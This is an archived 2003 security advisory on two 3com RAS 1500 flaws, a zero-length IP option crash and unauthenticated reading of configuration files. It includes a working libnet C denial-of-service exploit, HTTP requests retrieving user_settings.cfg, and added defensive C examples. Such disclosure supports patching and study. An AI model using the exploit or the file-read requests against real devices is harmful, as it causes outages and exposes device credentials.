24th Mar 2003 [SBWID-6089]
COMMAND
3com Remote vulnerabilities
SYSTEMS AFFECTED
3com RAS 1500, Product: 3C433279A-US Firmware X2.0.10
PROBLEM
From Piotr Chytla's [[email protected]] advisory:
http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt
The 3com SuperStack II Remote Access System 1500 is a telco device that
provides dial-in access to users over BRI-ISDN and analog lines. It contains
two remote vulnerabilities: the first is a Denial of Service that leads to a
system crash, the second can be used to read configuration files.
Details:
-------
1. Remote Denial of Service
It is possible to remotely reboot the RAS 1500 (router unit) by sending a
malformed packet with the IP option length field set to zero. This bug can
cause the loss of all switched connections on the PRI-ISDN interface.
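To show the defensive side of this, here is an added example that is not part of the original advisory or iSEC's code: a stand-alone IPv4 option walker in C that validates the option length byte before advancing, so a zero-length option like the one described above is rejected as malformed rather than trusted. The advisory does not say how the device itself parses options, so the code shows only the generic check any option parser needs; the three sample headers are constructed for the example.

```c
/* Added example: defensive IPv4 option validation (not code from the advisory).
 * An option list is a sequence of type/length/value entries; a parser that
 * advances by the length byte without checking it never makes progress on a
 * length of 0. The sample headers below are constructed for this example. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum ipopt_status {
    IPOPT_OK        =  0,  /* every option is well-formed */
    IPOPT_BAD_IHL   = -1,  /* IHL below 5 or header longer than the buffer */
    IPOPT_BAD_LEN   = -2,  /* option length 0 or 1: cannot advance safely */
    IPOPT_TRUNCATED = -3   /* option (or its length byte) runs past the header */
};

/* Walk the options of one IPv4 header. On success returns IPOPT_OK and stores
 * the number of options seen in *count; otherwise returns the first error. */
int validate_ipv4_options(const uint8_t *pkt, size_t len, size_t *count)
{
    size_t ihl, hdr_len, pos;

    if (len < 20)
        return IPOPT_BAD_IHL;
    ihl = pkt[0] & 0x0f;
    hdr_len = ihl * 4;
    if (ihl < 5 || hdr_len > len)
        return IPOPT_BAD_IHL;

    *count = 0;
    pos = 20;                           /* options start after the fixed header */
    while (pos < hdr_len) {
        uint8_t type = pkt[pos];
        uint8_t optlen;

        if (type == 0)                  /* EOL: end of option list */
            break;
        if (type == 1) {                /* NOP: one byte, no length field */
            pos++;
            (*count)++;
            continue;
        }
        if (pos + 1 >= hdr_len)         /* no room for the length byte */
            return IPOPT_TRUNCATED;
        optlen = pkt[pos + 1];
        if (optlen < 2)                 /* the zero-length case from the advisory */
            return IPOPT_BAD_LEN;
        if (pos + optlen > hdr_len)     /* option claims bytes beyond the header */
            return IPOPT_TRUNCATED;
        pos += optlen;
        (*count)++;
    }
    return IPOPT_OK;
}

/* Convenience wrapper: number of options on success, negative status on error. */
int ipv4_option_count(const uint8_t *pkt, size_t len)
{
    size_t n = 0;
    int st = validate_ipv4_options(pkt, len, &n);
    return st == IPOPT_OK ? (int)n : st;
}

/* Constructed sample 1: IHL 7, a NOP followed by a 7-byte Record Route option. */
const uint8_t SAMPLE_GOOD[28] = {
    0x47, 0x00, 0x00, 0x1c, 0x13, 0x37, 0x00, 0x00, 0xff, 0x06, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02,
    0x01,                                       /* NOP */
    0x07, 0x07, 0x04, 0x00, 0x00, 0x00, 0x00    /* RR, len 7, ptr 4 */
};

/* Constructed sample 2: IHL 6, option type 0xe4 with length 0, as in the advisory. */
const uint8_t SAMPLE_ZERO_LEN[24] = {
    0x46, 0x00, 0x00, 0x18, 0x13, 0x37, 0x00, 0x00, 0xff, 0xaa, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02,
    0xe4, 0x00, 0x00, 0x00
};

/* Constructed sample 3: IHL 6, option claims 16 bytes but only 4 remain. */
const uint8_t SAMPLE_OVERRUN[24] = {
    0x46, 0x00, 0x00, 0x18, 0x13, 0x37, 0x00, 0x00, 0xff, 0x06, 0x00, 0x00,
    0x0a, 0x00, 0x00, 0x01, 0x0a, 0x00, 0x00, 0x02,
    0x07, 0x10, 0x04, 0x00
};

int main(void)
{
    printf("good:     %d\n", ipv4_option_count(SAMPLE_GOOD, sizeof SAMPLE_GOOD));
    printf("zero-len: %d\n", ipv4_option_count(SAMPLE_ZERO_LEN, sizeof SAMPLE_ZERO_LEN));
    printf("overrun:  %d\n", ipv4_option_count(SAMPLE_OVERRUN, sizeof SAMPLE_OVERRUN));
    return 0;
}
```

The same walker can sit in front of any code that interprets options (a firewall rule, an IDS preprocessor, a device's input path): a packet that fails validation is dropped or logged before anything indexes into it.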
2. Configuration file read
An unauthorized user can read configuration and system files through the web
interface of the RAS 1500.
GET /download.htm HTTP/1.0
HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="RAS1500"
Content-Type: text/html
Server: Allegro-Software-RomPager/2.10
GET /user_settings.cfg HTTP/1.0
HTTP/1.0 200 OK
Content-Type: multipart
Date: Mon, 25 May 1998 00:26:38 GMT
Last-Modified: Tue, 01 Jan 1901 00:00:01 GMT
Content-Length: 1258
Server: Allegro-Software-RomPager/2.10
[..]
content of user_setting.cfg
The RAS 1500 requires HTTP basic authorization only for the download.htm file,
which is the download manager for configuration files and system software.
Unfortunately, the system images and configuration files themselves are not
protected by HTTP authorization.
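As an added example, not the advisory's or 3com's code, the two authorization rules side by side in C: the weak one mirrors what the advisory describes, challenging only the download manager page, while the corrected one is deny-by-default and exempts only an explicit public allowlist. Apart from /download.htm and /user_settings.cfg, the request paths, the allowlist entries and the .img suffix are hypothetical.

```c
/* Added example: authorization policy comparison (not code from the advisory).
 * weak_requires_auth() mirrors the behaviour described for the RAS 1500: only
 * /download.htm is challenged. strict_requires_auth() is the corrected rule:
 * every path is challenged unless it is on an explicit public allowlist.
 * Paths other than /download.htm and /user_settings.cfg are hypothetical. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static bool has_suffix(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lx = strlen(suffix);
    return ls >= lx && strcmp(s + ls - lx, suffix) == 0;
}

/* Weak rule: protect the page that lists the files, not the files themselves. */
bool weak_requires_auth(const char *path)
{
    return strcmp(path, "/download.htm") == 0;
}

/* Corrected rule: deny by default; only the listed pages are public. */
bool strict_requires_auth(const char *path)
{
    static const char *const public_paths[] = { "/", "/index.htm", "/login.htm" }; /* hypothetical */
    for (size_t i = 0; i < sizeof public_paths / sizeof public_paths[0]; i++)
        if (strcmp(path, public_paths[i]) == 0)
            return false;
    return true;
}

/* Sensitive resources for this device: configuration files and system images
 * (the .img suffix is an assumption; the advisory names only .cfg files). */
bool is_sensitive(const char *path)
{
    return has_suffix(path, ".cfg") || has_suffix(path, ".img");
}

/* Count how many sensitive paths a policy would serve without credentials. */
int count_exposed(bool (*requires_auth)(const char *), const char *const *paths, size_t n)
{
    int exposed = 0;
    for (size_t i = 0; i < n; i++)
        if (is_sensitive(paths[i]) && !requires_auth(paths[i]))
            exposed++;
    return exposed;
}

/* Constructed request sample. */
const char *const SAMPLE_PATHS[] = {
    "/index.htm", "/download.htm", "/user_settings.cfg", "/system.img", "/login.htm"
};
const size_t SAMPLE_COUNT = sizeof SAMPLE_PATHS / sizeof SAMPLE_PATHS[0];

int main(void)
{
    printf("weak policy exposes %d sensitive file(s)\n",
           count_exposed(weak_requires_auth, SAMPLE_PATHS, SAMPLE_COUNT));
    printf("strict policy exposes %d sensitive file(s)\n",
           count_exposed(strict_requires_auth, SAMPLE_PATHS, SAMPLE_COUNT));
    return 0;
}
```

The point of the comparison is that authorization has to be attached to the resource being served, not to the UI page that links to it; with the deny-by-default rule a newly added file is protected unless someone deliberately makes it public.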
Exploit:
--------
Below is a working proof-of-concept exploit for vulnerability no. 1.
------X<------isec-options.c------X<------
/*
 * 3com superstack II RAS 1500 remote Denial of Service
 *
 * Piotr Chytla <[email protected]>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 *
 * Uses the libnet 1.0 API (libnet_build_ip / libnet_insert_ipo / libnet_write_ip).
 */
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memcpy(), strlen() */
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* getopt(), optarg */
#include <sys/types.h>
#include <sys/socket.h>
#include <libnet.h>
#define OPT_LEN 4       /* one 4-byte IP option: type, length, two padding bytes */

void usage()
{
    printf("Args: \n");
    printf("-s [source address]\n");
    printf("-d [destination address]\n");
}

int main(int argc, char *argv[])
{
    int a;              /* getopt() returns int; a plain char may never equal EOF */
    int sock, r;
    u_long src = 0;
    u_long dst = 0;
    char pktbuf[IP_MAXPACKET];
    char payload[] = "ABCDEFGHIJKLMNOPRST";
    u_char options[4];
    struct ipoption ipopt;

    bzero(options, OPT_LEN);
    while ((a = getopt(argc, argv, "d:s:h?")) != EOF)
    {
        switch (a) {
        case 'h': { usage(); exit(1); }
        case 's': { src = libnet_name_resolve(optarg, 0); break; }
        case 'd': { dst = libnet_name_resolve(optarg, 0); break; }
        }
    }
    if (src == 0 || dst == 0)   /* both addresses are required */
    {
        usage();
        exit(1);
    }
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock < 0)
    {
        perror("socket");
        exit(1);
    }
    /* Plain IP header (id 0x1337, ttl 255, protocol 0xaa) carrying the payload. */
    libnet_build_ip(strlen(payload), 0, 0x1337, 0, 255, 0xaa, src, dst,
                    payload, strlen(payload), pktbuf);
    /* Option bytes: type 0xe4, length 0 (the malformed value), two zero padding bytes. */
    memcpy(ipopt.ipopt_list, options, OPT_LEN);
    *(ipopt.ipopt_list)     = 0xe4;
    *(ipopt.ipopt_list + 1) = 0;
    *(ipopt.ipopt_list + 2) = 0;
    *(ipopt.ipopt_list + 3) = 0;
    r = libnet_insert_ipo(&ipopt, OPT_LEN, pktbuf);
    if (r < 0)
    {
        libnet_close_raw_sock(sock);
        printf("Error ip options insertion failed\n");
        exit(1);
    }
    r = libnet_write_ip(sock, pktbuf, LIBNET_IP_H + OPT_LEN + strlen(payload));
    if (r < 0)
    {
        libnet_close_raw_sock(sock);
        printf("Error write_ip \n");
        exit(1);
    }
    libnet_close_raw_sock(sock);
    return 0;
}
------X<------isec-options.c------X<------
SOLUTION
?